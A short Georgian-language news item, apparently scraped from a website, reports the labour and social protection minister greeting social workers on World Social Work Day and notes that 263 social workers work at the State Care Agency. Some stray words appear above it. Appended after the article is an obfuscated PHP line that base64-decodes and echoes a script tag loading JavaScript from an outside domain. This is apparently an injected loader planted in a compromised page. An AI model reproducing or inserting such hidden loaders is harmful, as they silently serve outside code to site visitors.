celsiusi
ავერსი შნაიდერი

 მიხეილ სარჯველაძემ, სოციალურ მუშაკებს, პროფესიული დღე - სოციალური მუშაობის მსოფლიო დღე მიულოცა. ოკუპირებული ტერიტორიებიდან დევნილთა, შრომის ჯანმრთელობისა და სოციალური დაცვის მინისტრი სახელმწიფო ზრუნვის სააგენტოში იმყოფებოდა, სადაც სააგენტოს მუშაობის სპეციფიკას გაეცნო, სოციალური მუშაკის სამუშაოს მნიშვნელობაზე გაამახვილა ყურადღება და მათ მხარდაჭერა აღუთქვა.

სახელმწიფო ზრუნვისა და ტრეფიკინგის მსხვერპლთა, დაზარალებულთა დახმარების სააგენტოში, ქვეყნის მასშტაბით, დასაქმებულია 263 სოციალური მუშაკი. ისინი მომსახურებას უწევენ ძალადობის მსხვერპლ ბავშვებს და მათ ოჯახებს, ხანდაზმულებს, შეზღუდული შესაძლებლობების მქონე პირებს, ქუჩაში მცხოვრებ და მომუშავე არასრულწლოვნებსა და ოჯახში ძალადობის მსხვერპლებს. სოციალური მუშაკები უდიდეს როლს ასრულებენ ადამიანების, საზოგადოების სრულფასოვან წევრად ჩამოყალიბებაში.
225
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");